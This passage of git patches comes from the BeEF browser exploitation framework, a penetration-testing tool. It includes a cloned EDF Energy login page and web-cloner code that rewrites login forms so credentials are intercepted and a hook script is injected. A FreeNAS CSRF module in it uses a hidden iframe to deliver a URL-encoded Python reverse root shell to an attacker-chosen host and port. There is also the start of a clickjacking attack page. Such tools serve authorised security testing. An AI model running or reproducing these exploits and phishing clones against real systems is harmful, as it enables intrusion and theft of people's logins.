+					<img alt="" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/banners/my-account.jpg" />
+					<div id="banner_text">
+					 <p>
+                        &nbsp;<br />&nbsp;<br />Login or register<br />to access your<br />
+                        energy account online<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;
+                      </p>
+
+					</div>
+				  </div>
+				</div>
+				<div id="two-col-wrap" class="two_col_wrap_bg">
+                  
+				  <div id="content" class="make-full">
+					<div id="data">
+						<div id="leftcolumn">
+							<h2>Login to MyAccount</h2>
+
+<!-- Prototype Builder Start srm::-->
+
+<form name="logonForm" method="post" action="/irj/portal/anonymous">
+				<span class="legacymessage">
+				
+				</span>
+				<span class="legacymessage">
+				
+				</span>
+			  
+				
+			  	
+				<span class="warningmessage" id="errorMessage"></span><BR/>
+				<span class="warningmessage" id="errorMessage1"></span>
+				
+				
+				<input type ="hidden" name = "f_method" value = "LOGIN" />
+				<table class="formfields" border="1" summary="Visual Layout for the login form">
+				<tbody>
+				<tr>
+				<th><label for="f_username">Username (email address)<em>*</em></label></th><td>
+				
+				<input id="f_username" name="f_username" type="text" size="27" maxlength="241" tabindex="1" value=""/>
+				
+				<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_username"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter your username</SPAN></A>
+				</td>
+				</tr>
+				<tr>
+				<th><label for="f_passwd">Password<em>*</em></label></th><td>
+				
+				<input id="f_passwd" name="f_passwd" type="Password" size="18" maxlength="16" tabindex="2" autocomplete=OFF/>
+				
+				<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_passwd"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter the password for this account</SPAN></A>
+				</td>
+				</tr>
+				
+				</tbody>
+				</table>
+				
+
+				<input type="submit" value="Login" style="background:#FE5815;color:white!important;heigth:6em;width:7em;font-size:14px;font-family:arial;font-weight:500;margin:0px;padding-left:15px;padding-right:15px;padding-top:7px;padding-bottom:7px;border:none;cursor:pointer">
+
+				
+				<br /><br /><br />
+				<p>Forgotten your <a href="javaScript:validateFU();">username</a> or <a href="javaScript:validateFP();">password</a>?</p>
+			<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUN7mVuDM1dmcrQChOQXirPHBYBwncOB_h5_QMzu8x_5eBlZcqXpqJKJuOtpQFlZPpXFhCbOjTPxw=="></form>
+
+<!-- Prototype Builder End -->
+						</div>
+						<div id="rightcolumn">			
+					<h2>Register Today!</h2>
+				  <p>&nbsp;</p>
+
+		  <ul>
+				<li class="tick"> View and pay your bills</li>
+			  <li class="tick"> Submit your meter reading</li>
+			  <li class="tick"> Update your details</li>
+			  <li class="tick"> Sign up for Direct Debit</li>
+		  </ul><br/>
+									
+
+<table border=0><tr>
+<td>										
+			<div class="btbu" id="registerButtonResi"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterResi();" class="">Register your<br> home &raquo;</a></div> 
+			</td><td>
+&nbsp;&nbsp;&nbsp;</td>
+<td>			<div class="btbu" id="registerButtonSME"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterSME();" class="">Register your<br> business &raquo;</a></div>
+	</td></tr>
+	</table>								
+<br/>
+								  <p><strong>Don't have an online account?</strong><br/>You can still <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateMR();">submit a meter reading</a></p>
+						</div>
+					</div>
+				  </div>
+				</div>
+			  </div>
+			</div>
+<!--------------------------- end middle section ----------------------------------->	
+		
+</div><!--pagehold-->
+		
+<!--------------------------- start bottom section ----------------------------------->	
+          
+
+		
+
+
+
+
+
+
+<script type="text/javascript">
+var __stormJs = 't1.stormiq.com/dcv4/jslib/3171_71E90107_6FC7_48DB_B3F5_713D754C9B89.js';
+</script>
+<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/track.js"></script>
+
+
+<script type="text/javascript">
+
+function TermsAndConditions()
+{
+	window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=TermsAndConditions.htm","MyAccount","location=no,scrollbars=yes");
+	//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=tnc";
+}
+function PrivacyPolicy()
+{
+	window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=Privacy.html","MyAccount","location=no,scrollbars=yes");
+	//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=privacy";
+}
+// Removes leading whitespaces
+function LTrim( value ) {
+	
+	var re = /\s*((\S+\s*)*)/;
+	return value.replace(re, "$1");
+	
+}
+
+// Removes ending whitespaces
+function RTrim( value ) {
+	
+	var re = /((\s*\S+)*)\s*/;
+	return value.replace(re, "$1");
+	
+}
+
+// Removes leading and ending whitespaces
+function trim( value ) {
+	
+	return LTrim(RTrim(value));
+	
+}
+
+</script>
+
+
+
+<!-- start bottom section -->	
+		  <div id="footer">
+			<ul>
+			  <li>
+				<a href="javascript:TermsAndConditions();">Terms &amp; conditions</a>
+			  </li>
+			  <li>
+				<a href="javascript:PrivacyPolicy();">Privacy</a>
+			  </li>
+			  <li>
+				<a href="http://www.edfenergy.com/products-services/accessibility.shtml" target="_blank">Accessibility</a>
+			  </li>
+			  <li>
+				<a href="http://www.edfenergy.com/products-services/copyright.shtml" target="_blank">Copyright statement</a>
+			  </li>
+			  <li class="last">
+				<a href="http://www.edfenergy.com/products-services/fuel-mix.shtml" target="_blank">Our fuel mix</a>
+			  </li>
+			</ul>
+			
+				<p class="copy"> &copy; EDF Energy 2012 All rights reserved</p>
+				<p class = "cookiePolicy">By continuing to use this site, you agree to our <a target="_blank" href="http://www.edfenergy.com/about-us/cookies/cookie-policy.shtml" style = "text-decoration:underline; color: #fff">Cookie Policy</a>.If you don't agree to Cookies<br>being stored on your computer in line with that policy please navigate away from this site.</p>
+		  </div>
+          
+<!-- end bottom section -->		
+
+
+<SCRIPT>
+	document.body.scroll = "";
+</SCRIPT>			
+<!--------------------------- end bottom section ----------------------------------->	
+	  
+		</div><!--outer-->
+	  </div>
+	</div><!--wrap-->
+  </body>
+</html>
+
+
+</TD></TR></TABLE>
+
+
+</body></html>
\ No newline at end of file
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index a6aa9d188..a0a85f7c2 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -40,6 +40,7 @@ module BeEF
             body = JSON.parse request.body.read
             uri = body["url"]
             mount = body["mount"]
+            use_existing = body["use_existing"]
 
             if uri != nil && mount != nil
               if (uri =~ URI::regexp).nil? #invalid URI
@@ -53,7 +54,7 @@ module BeEF
               end
 
               web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
-              success = web_cloner.clone_page(uri,mount)
+              success = web_cloner.clone_page(uri,mount,use_existing)
               if success
                 result = {
                     "success" => true,
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 1cf5feb7f..5f56f2ae8 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -27,7 +27,7 @@ module BeEF
           @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
         end
 
-        def clone_page(url, mount)
+        def clone_page(url, mount, use_existing)
           print_info "Cloning page at URL #{url}"
           uri = URI(url)
           output = uri.host
@@ -35,84 +35,94 @@ module BeEF
           user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
 
           success = false
-          # prevent command injection attacks, passing URLs like (http://antisnatchor'||touch /tmp/foo #). No shells are open in the following case.
-          begin
-            IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate","--background"], 'r+') do |wget_io| end
-            success = true
-          rescue Exception => e
-            print_error "Errors executing wget: #{e}"
-            print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
-          end
 
-          if success
-            File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
-              File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
-                # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
-                if line.include?("<form ")
-                  line_attrs = line.split(" ")
-                  c = 0
-                  cc = 0
-                  #todo: probably doable also with map!
+          # Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser,
+          # there is no need to implement the complex logic to handle all different cases.
+          # We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification.
+          # So ideally, if the the page needs custom modifications, the web_cloner usage will be the following:
+          # 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file
+          # - the user modify the example.com_mod file manually
+          # 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file
+          #
+          if use_existing.nil? || use_existing == false
+            begin                                                                                                                      #,"--background"
+              IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end
+              success = true
+            rescue Exception => e
+              print_error "Errors executing wget: #{e}"
+              print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
+            end
 
-                  # modify the form 'action' attribute
-                  line_attrs.each do |attr|
-                    if attr.include? "action=\""
-                      print_info "Form action found: #{attr}"
-                      break
+            if success
+              File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
+                File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
+                  # Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
+                  if line.include?("<form ")
+                    line_attrs = line.split(" ")
+                    c = 0
+                    cc = 0
+                    #todo: probably doable also with map!
+                    # modify the form 'action' attribute
+                    line_attrs.each do |attr|
+                      if attr.include? "action=\""
+                        print_info "Form action found: #{attr}"
+                        break
+                      end
+                      c += 1
                     end
-                    c += 1
+                    line_attrs[c] = "action=\"#{mount}\""
+
+                    #todo: to be tested, needed in case like yahoo
+                    # delete the form 'onsubmit' attribute
+                    #line_attrs.each do |attr|
+                    #  if attr.include? "onsubmit="
+                    #    print_info "Form onsubmit event found: #{attr}"
+                    #    break
+                    #  end
+                    #  cc += 1
+                    #end
+                    #line_attrs[cc] = ""
+
+                    mod_form = line_attrs.join(" ")
+                    print_info "Form action value changed in order to be intercepted :-D"
+                    out_file.print mod_form
+                    # Add the BeEF hook
+                  elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
+                    out_file.print add_beef_hook(line)
+                    print_info "BeEF hook added :-D"
+                  else
+                    out_file.print line
                   end
-                  line_attrs[c] = "action=\"#{mount}\""
-
-                  #todo: to be tested, needed in case like yahoo
-                  # delete the form 'onsubmit' attribute
-                  #line_attrs.each do |attr|
-                  #  if attr.include? "onsubmit="
-                  #    print_info "Form onsubmit event found: #{attr}"
-                  #    break
-                  #  end
-                  #  cc += 1
-                  #end
-                  #line_attrs[cc] = ""
-
-                  mod_form = line_attrs.join(" ")
-                  print_info "Form action value changed in order to be intercepted :-D"
-                  out_file.print mod_form
-                  # Add the BeEF hook
-                elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
-                  out_file.print add_beef_hook(line)
-                  print_info "BeEF hook added :-D"
-                else
-                  out_file.print line
                 end
               end
             end
-
-            if File.size("#{@cloned_pages_dir + output}") > 0
-              print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
-
-              file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
-
-              # Check if the original URL can be framed
-              frameable = is_frameable(url)
-
-              interceptor = BeEF::Extension::SocialEngineering::Interceptor
-              interceptor.set :redirect_to, url
-              interceptor.set :frameable, frameable
-              interceptor.set :beef_hook, @beef_hook
-              interceptor.set :cloned_page, get_page_content(file_path)
-              interceptor.set :db_entry, persist_page(url,mount)
-
-              @http_server.mount("#{mount}", interceptor.new)
-              print_info "Mounting cloned page on URL [#{mount}]"
-              @http_server.remap
-              success = true
-            else
-              print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
-              success = false
-            end
           end
-            success
+
+          if File.size("#{@cloned_pages_dir + output}") > 0
+            print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
+
+            file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
+
+            # Check if the original URL can be framed
+            frameable = is_frameable(url)
+
+            interceptor = BeEF::Extension::SocialEngineering::Interceptor
+            interceptor.set :redirect_to, url
+            interceptor.set :frameable, frameable
+            interceptor.set :beef_hook, @beef_hook
+            interceptor.set :cloned_page, get_page_content(file_path)
+            interceptor.set :db_entry, persist_page(url,mount)
+
+            @http_server.mount("#{mount}", interceptor.new)
+            print_info "Mounting cloned page on URL [#{mount}]"
+            @http_server.remap
+            success = true
+          else
+            print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
+            success = false
+          end
+
+          success
         end
 
         private

From 5fc56a9dfa03cf22c8d42f357d1e7de4ce2780ab Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Fri, 7 Sep 2012 08:41:02 +0100
Subject: [PATCH 032/397] Social Eng. extension: added stub for mass_mailer DB
 structure

---
 .../social_engineering/models/mass_mailer.rb  | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 extensions/social_engineering/models/mass_mailer.rb

diff --git a/extensions/social_engineering/models/mass_mailer.rb b/extensions/social_engineering/models/mass_mailer.rb
new file mode 100644
index 000000000..142f2395e
--- /dev/null
+++ b/extensions/social_engineering/models/mass_mailer.rb
@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Models
+
+      class Massmailer
+
+        include DataMapper::Resource
+
+        storage_names[:default] = 'extension_seng_massmailer'
+
+        property :id, Serial
+
+        #todo fields
+      end
+
+    end
+  end
+end

From 8625452751ab8a07724ac410cb51f93bab8fa632 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 7 Sep 2012 20:30:19 +0930
Subject: [PATCH 033/397] Add support for Firefox 15

---
 core/main/client/browser.js | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 519285a08..97b8317a6 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -188,12 +188,20 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
 	},
 
+	/**
+	 * Returns true if FF15
+	 * @example: beef.browser.isFF15()
+	 */
+	isFF15: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15();
 	},
 
 	/**
@@ -463,6 +471,7 @@ beef.browser = {
 			FF12:	this.isFF12(),	// Firefox 12
 			FF13:	this.isFF13(),	// Firefox 13
 			FF14:	this.isFF14(),	// Firefox 14
+			FF15:	this.isFF15(),	// Firefox 15
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
@@ -526,6 +535,7 @@ beef.browser = {
 		if (this.isFF12())	{ return '12' };	// Firefox 12
 		if (this.isFF13())	{ return '13' };	// Firefox 13
 		if (this.isFF14())	{ return '14' };	// Firefox 14
+		if (this.isFF15())  { return '15' };    // Firefox 15
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7

From 384fe7bcab44e8bce8ca0b4a7178a9a4a63ed73b Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 7 Sep 2012 23:00:24 +0930
Subject: [PATCH 034/397] Fix issue #741

---
 modules/exploits/local_host/java_payload/module.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/local_host/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb
index 2f3380bc7..bd0e902dc 100755
--- a/modules/exploits/local_host/java_payload/module.rb
+++ b/modules/exploits/local_host/java_payload/module.rb
@@ -16,7 +16,7 @@
 class Java_payload < BeEF::Core::Command
 
   def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
   end
 
   def self.options

From 69c59bb4276cd6d54591a4a59d4216bd07b7dd03 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Fri, 7 Sep 2012 17:21:17 +0100
Subject: [PATCH 035/397] Social Eng. extension: moved the extension config
 line in main config file.

---
 config.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/config.yaml b/config.yaml
index 2c5939e42..29bf0fef2 100644
--- a/config.yaml
+++ b/config.yaml
@@ -94,8 +94,8 @@ beef:
             enable: false
         social_engineering:
             enable: false
-        console:
-            shell:
-                enable: false
         evasion:
             enable: false
+        console:
+             shell:
+                enable: false

From 9e47942d3fc527aaad61aacedf1a8c346101b524 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 9 Sep 2012 21:05:16 +0930
Subject: [PATCH 036/397] Added FreeNAS remote reverse root shell CSRF module

For more information see: http://support.freenas.org/ticket/1788
---
 .../command.js                                | 34 +++++++++++++++++
 .../config.yaml                               | 28 ++++++++++++++
 .../freenas_reverse_root_shell_csrf/module.rb | 37 +++++++++++++++++++
 3 files changed, 99 insertions(+)
 create mode 100644 modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
 create mode 100644 modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
 create mode 100644 modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb

diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
new file mode 100644
index 000000000..8df334d6c
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js
@@ -0,0 +1,34 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var sid   = Math.floor(Math.random()*1000)+1;
+
+  var freenas_add_user_iframe = beef.dom.createInvisibleIframe();
+  freenas_add_user_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/system/terminal/?s='+sid+'&k=%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22%0d');
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(freenas_add_user_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
new file mode 100644
index 000000000..012b7f74f
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml
@@ -0,0 +1,28 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+################################################################################
+# For more information see: http://support.freenas.org/ticket/1788
+################################################################################
+beef:
+    module:
+        freenas_reverse_root_shell_csrf:
+            enable: true
+            category: ["Exploits", "NAS"]
+            name: "FreeNAS Reverse Root Shell CSRF"
+            description: "Attempts to get a reverse root shell on a FreeNAS server.<br/>Tested on version 8.2.0 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
new file mode 100644
index 000000000..edc0805c5
--- /dev/null
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
@@ -0,0 +1,37 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+################################################################################
+# For more information see: http://support.freenas.org/ticket/1788
+################################################################################
+class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 19b1baee43f7230a91300596f2e078280a765176 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Mon, 10 Sep 2012 21:19:41 +1000
Subject: [PATCH 037/397] Version updated

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index ea837d9ad..c01c6178d 100644
--- a/VERSION
+++ b/VERSION
@@ -14,4 +14,4 @@
 #   limitations under the License.
 #
 
-0.4.3.7-alpha
+0.4.3.8-alpha
diff --git a/config.yaml b/config.yaml
index 29bf0fef2..06b0b361a 100644
--- a/config.yaml
+++ b/config.yaml
@@ -16,7 +16,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.7-alpha'
+    version: '0.4.3.8-alpha'
     debug: false
 
     restrictions:

From cef72c95188316d1618b2e60bc9b1c0904df1dd2 Mon Sep 17 00:00:00 2001
From: Rich Lundeen <richard.lundeen@gmail.com>
Date: Mon, 10 Sep 2012 14:25:46 -0700
Subject: [PATCH 038/397] Improved Clickjacking Module

Rewrite of bcole's module. Adds support for multiple clicks, Javascript
event feedback, some basic framebusting evasion, and IE support
---
 extensions/demos/html/clickjack.html          |   4 -
 .../html/clickjacking/clickjack_attack.html   | 174 ++++++++++++++++
 .../html/clickjacking/clickjack_victim.html   |   9 +
 .../clickjacking/command.js                   | 196 +++++++++++-------
 .../clickjacking/config.yaml                  |  10 +-
 .../social_engineering/clickjacking/module.rb |  67 ++++--
 6 files changed, 365 insertions(+), 95 deletions(-)
 delete mode 100644 extensions/demos/html/clickjack.html
 create mode 100644 extensions/demos/html/clickjacking/clickjack_attack.html
 create mode 100644 extensions/demos/html/clickjacking/clickjack_victim.html

diff --git a/extensions/demos/html/clickjack.html b/extensions/demos/html/clickjack.html
deleted file mode 100644
index 486fe35b0..000000000
--- a/extensions/demos/html/clickjack.html
+++ /dev/null
@@ -1,4 +0,0 @@
-<p>&nbsp;</p>
-<a href="#" onclick="javascript:alert('You clicked a link at '+window.location);">moooooooo</a>
-<p>&nbsp;</p>
-
diff --git a/extensions/demos/html/clickjacking/clickjack_attack.html b/extensions/demos/html/clickjacking/clickjack_attack.html
new file mode 100644
index 000000000..9b09b4275
--- /dev/null
+++ b/extensions/demos/html/clickjacking/clickjack_attack.html
@@ -0,0 +1,174 @@
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
+<head>
+	<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
+	<title>You have been p0wned</title>
+	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
+	<script src="http://cdn.jquerytools.org/1.2.7/all/jquery.tools.min.js"></script>
+
+<style type="text/css">
+body{
+color:#fff;
+font-family:'Neuton', georgia, serif;
+background-color:#999;
+width:100%;
+height:100%;
+}
+.quotes{
+width:100%;
+height:100%;
+text-align:center;
+margin:50px 0;
+}
+.quotes .inner{
+width:700px;
+margin:0 auto;
+}
+.inner h1{
+font-variant:small-caps;
+color:#333;
+font-size:30px;
+text-shadow:0 0 2px #2D58C4;
+width:361px;
+height:58px;
+margin:0 auto 30px;
+background-repeat:no-repeat;
+}
+.inner .text {
+line-height:48px;
+font-size:42px;
+}
+.inner .more-quotes{
+display:inline-block;
+width:200px;
+background:#09C;
+color:#fff;
+height:30px;
+line-height:30px;
+-webkit-border-radius:5px;
+-moz-border-radius:5px;
+border-radius5px;
+border:1p solid #999;
+text-decoration:none;
+margin-top:40px;
+}
+.inner .footnote{
+padding:5px 0;
+}
+.inner .footnote > a{
+display:inline-block;
+width:100px;
+background:#09C;
+color:#fff;
+height:30px;
+line-height:30px;
+-webkit-border-radius:5px;
+-moz-border-radius:5px;
+border-radius5px;
+border:1p solid #999;
+text-decoration:none;
+margin-top:5px;
+}
+.inner .footnote > span{
+display:none;
+}
+.click-thru{
+color:#333;
+display:none;
+width:400px;
+border:10px solid #666;
+border:10px solid rgba(82, 82, 82, 0.698);
+-moz-border-radius:8px;
+-webkit-border-radius:8px;
+z-index:10000;
+}
+.click-thru div{
+padding:10px;
+border:1px solid #3B5998;
+background-color:#fff;
+}
+.click-thru h2{
+margin:-11px;
+margin-bottom:0px;
+color:#fff;
+background-color:#6D84B4;
+padding:5px 10px;
+border:1px solid #3B5998;
+font-size:20px;
+}
+</style>
+</head>
+<body>
+<!-- BeEF hook call -->
+<script type="text/javascript">
+	var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
+	document.write(commandModuleStr);
+</script>
+
+
